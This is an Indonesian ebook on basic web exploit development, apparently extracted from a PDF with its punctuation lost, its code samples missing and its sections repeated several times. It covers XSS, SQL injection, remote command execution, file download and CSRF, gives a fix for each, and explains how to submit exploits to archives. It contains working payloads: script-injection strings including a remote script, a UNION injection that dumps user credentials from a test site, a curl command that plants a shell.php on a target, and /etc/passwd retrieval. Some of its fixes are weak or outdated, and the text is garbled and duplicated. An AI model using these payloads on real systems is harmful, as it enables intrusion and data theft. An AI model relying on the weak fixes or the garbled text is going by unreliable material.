0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 3: Basic Web Exploit Development

0x05 - Local File DownloadApa itu Local File Download Kode yang Menimbulkan Celah Injeksi Local File Download Menutup Celah Local File Download

0x06 - Cross Site Request ForgeryApa itu Cross Site Request Forgery Kode yang Menimbulkan Celah Injeksi Cross Site Request Forgery ~ Kode Exploit Cross Site Request Forgery Menutup Cross Site Request Forgery

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim ~ Contoh Keterangan Exploit Mengirim Exploit ke 1337day Mengirim Exploit ke Exploit-DB Mengirim Exploit ke Packet Storm Security

0x01 - Pengenalan

Apa itu Web ExploitWeb Exploit adalah suatu script atau kode yang menyerang suatu web secara spesifikWeb Exploit digunakan untuk melakukan penetrasi terhadap suatu web secara legalmaupun ilegal untuk mencari suatu kerentanan atau kelemahan (vulnerability) pada suatuweb

Jenis-Jenis Web ExploitWeb Exploit ada beberapa jenis pada kali ini penulis hanya membahas beberapa sajayaitu1 Cross Site Scripting2 SQL Injection3 Remote Code Execution4 Local File Download5 Cross Site Request Forgery

Teknik Mencari Web ExploitAda beberapa teknik untuk mencari sebuah Web Exploit yaitu

1 Analysis Code (Menganalisa Kode)Teknik ini adalah menganalisis secara langsung kode yang ada pada web application Content Management System (CMS) apakah ada kode yang menyebabkan kerentananatau tidak

2 Google Search Engine (Pencarian Google)Teknik ini adalah memanfaatkan Google untuk mencari web exploit denganmemanfaatkan Google Dork

0x02 - Cross Site Scripting

Apa itu Cross Site ScriptingCross Site Scripting merupakan salah satu jenis serangan injeksi code (code injectionattack) dengan memanfaatkan sebuah kode seperti html javascript dan css

Tipe Cross Site Scripting1 Non PersistentCross Site Scripting tipe ini adalah dengan memanfaatkan URL untuk melakukan injeksiContoh http127001xssphpxss=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt

2 Persistent StoredCross Site Scripting tipe ini adalah kode yang kita masukan akan masuk kedalam databaseweb dan akan di load pada sebuah tempat biasanya terdapat di guestbook comment danpost

0x02 - Cross Site Scripting

Kode yang Menimbulkan CelahCross Site Scripting dapat terjadi karena kesalahan dalam sebuah kode dan tidak adanyafilter terhadap kode injeksi Berikut kode yang dapat menimbulkan celah ini

Non Persistent

Jika kita memasukkan parameter xss dan memasukkan kode injeksi html maka akanditampilkan kedalam web

Namun karena pada suatu web itu berbeda kodenya maka bukan hanya seperti itu sajakode yang dapat menimbulkan celah ini Contoh pada CMS MyBB 18

Beda jauh bukan dengan kode diatas tadi Karena beda framework beda kodenya tetapicelahnya tetap sama yaitu tidak adanya filter

Persistent Stored

Tidak jauh beda dengan Non Persistent Celahnya masih terdapat pada parameter

0x02 - Cross Site Scripting

Injeksi Cross Site ScriptingUntuk melakukan injeksi terhadap Cross Site Scripting kita harus memasukan kode injeksipada parameter yang terjadi pada celah ini

Non Persistenthttp127001profilephpname=[Script]

Untuk melakukan injeksi kita akan memasukan kode injeksi pada parameter name

http127001profilephpname=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt

Pada contoh diatas celah ini terdapat pada file profilephp dan pada parameter nameJika kita telah melakukan injeksi terhadap parameter tersebut maka kode akan berubah

Persistent Stored

Dilihat pada gambar diatas untuk menginjeksi celah ini kita memasukan kode injeksi padasebuah form text lalu melakukan submit

0x02 - Cross Site Scripting

Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass

Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass

Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter

Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs

Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet

0x02 - Cross Site Scripting

Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars

Non Persistent

Menambahkan fungsi php htmlspecialchars pada parameter name

Persistent Stored

Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database

0x03 - SQL Injection

Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target

0x03 - SQL Injection

Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini

Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah

Mengapa bisa berubah

Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo

Query SQL diatas akan berubah menjadi

Maka akan menyebabkan error atau vulnerability pada query SQL

0x03 - SQL Injection

Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +

http127001postphpid=[Query]

Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=

Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--

Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11

0x03 - SQL Injection

Injeksi SQL Injection

Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()

Maka akan muncul tables yang ada

Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users

0x03 - SQL Injection

Injeksi SQL Injection

Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)

Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--

Maka akan muncul column yang ada

Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 4: Basic Web Exploit Development

0x01 - Pengenalan

Apa itu Web ExploitWeb Exploit adalah suatu script atau kode yang menyerang suatu web secara spesifikWeb Exploit digunakan untuk melakukan penetrasi terhadap suatu web secara legalmaupun ilegal untuk mencari suatu kerentanan atau kelemahan (vulnerability) pada suatuweb

Jenis-Jenis Web ExploitWeb Exploit ada beberapa jenis pada kali ini penulis hanya membahas beberapa sajayaitu1 Cross Site Scripting2 SQL Injection3 Remote Code Execution4 Local File Download5 Cross Site Request Forgery

Teknik Mencari Web ExploitAda beberapa teknik untuk mencari sebuah Web Exploit yaitu

1 Analysis Code (Menganalisa Kode)Teknik ini adalah menganalisis secara langsung kode yang ada pada web application Content Management System (CMS) apakah ada kode yang menyebabkan kerentananatau tidak

2 Google Search Engine (Pencarian Google)Teknik ini adalah memanfaatkan Google untuk mencari web exploit denganmemanfaatkan Google Dork

0x02 - Cross Site Scripting

Apa itu Cross Site ScriptingCross Site Scripting merupakan salah satu jenis serangan injeksi code (code injectionattack) dengan memanfaatkan sebuah kode seperti html javascript dan css

Tipe Cross Site Scripting1 Non PersistentCross Site Scripting tipe ini adalah dengan memanfaatkan URL untuk melakukan injeksiContoh http127001xssphpxss=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt

2 Persistent StoredCross Site Scripting tipe ini adalah kode yang kita masukan akan masuk kedalam databaseweb dan akan di load pada sebuah tempat biasanya terdapat di guestbook comment danpost

0x02 - Cross Site Scripting

Kode yang Menimbulkan CelahCross Site Scripting dapat terjadi karena kesalahan dalam sebuah kode dan tidak adanyafilter terhadap kode injeksi Berikut kode yang dapat menimbulkan celah ini

Non Persistent

Jika kita memasukkan parameter xss dan memasukkan kode injeksi html maka akanditampilkan kedalam web

Namun karena pada suatu web itu berbeda kodenya maka bukan hanya seperti itu sajakode yang dapat menimbulkan celah ini Contoh pada CMS MyBB 18

Beda jauh bukan dengan kode diatas tadi Karena beda framework beda kodenya tetapicelahnya tetap sama yaitu tidak adanya filter

Persistent Stored

Tidak jauh beda dengan Non Persistent Celahnya masih terdapat pada parameter

0x02 - Cross Site Scripting

Injeksi Cross Site ScriptingUntuk melakukan injeksi terhadap Cross Site Scripting kita harus memasukan kode injeksipada parameter yang terjadi pada celah ini

Non Persistenthttp127001profilephpname=[Script]

Untuk melakukan injeksi kita akan memasukan kode injeksi pada parameter name

http127001profilephpname=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt

Pada contoh diatas celah ini terdapat pada file profilephp dan pada parameter nameJika kita telah melakukan injeksi terhadap parameter tersebut maka kode akan berubah

Persistent Stored

Dilihat pada gambar diatas untuk menginjeksi celah ini kita memasukan kode injeksi padasebuah form text lalu melakukan submit

0x02 - Cross Site Scripting

Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass

Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass

Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter

Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs

Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet

0x02 - Cross Site Scripting

Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars

Non Persistent

Menambahkan fungsi php htmlspecialchars pada parameter name

Persistent Stored

Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database

0x03 - SQL Injection

Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target

0x03 - SQL Injection

Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini

Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah

Mengapa bisa berubah

Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo

Query SQL diatas akan berubah menjadi

Maka akan menyebabkan error atau vulnerability pada query SQL

0x03 - SQL Injection

Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +

http127001postphpid=[Query]

Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=

Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--

Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11

0x03 - SQL Injection

Injeksi SQL Injection

Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()

Maka akan muncul tables yang ada

Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users

0x03 - SQL Injection

Injeksi SQL Injection

Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)

Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--

Maka akan muncul column yang ada

Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 5: Basic Web Exploit Development

0x02 - Cross Site Scripting

Apa itu Cross Site ScriptingCross Site Scripting merupakan salah satu jenis serangan injeksi code (code injectionattack) dengan memanfaatkan sebuah kode seperti html javascript dan css

Tipe Cross Site Scripting1 Non PersistentCross Site Scripting tipe ini adalah dengan memanfaatkan URL untuk melakukan injeksiContoh http127001xssphpxss=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt

2 Persistent StoredCross Site Scripting tipe ini adalah kode yang kita masukan akan masuk kedalam databaseweb dan akan di load pada sebuah tempat biasanya terdapat di guestbook comment danpost

0x02 - Cross Site Scripting

Kode yang Menimbulkan CelahCross Site Scripting dapat terjadi karena kesalahan dalam sebuah kode dan tidak adanyafilter terhadap kode injeksi Berikut kode yang dapat menimbulkan celah ini

Non Persistent

Jika kita memasukkan parameter xss dan memasukkan kode injeksi html maka akanditampilkan kedalam web

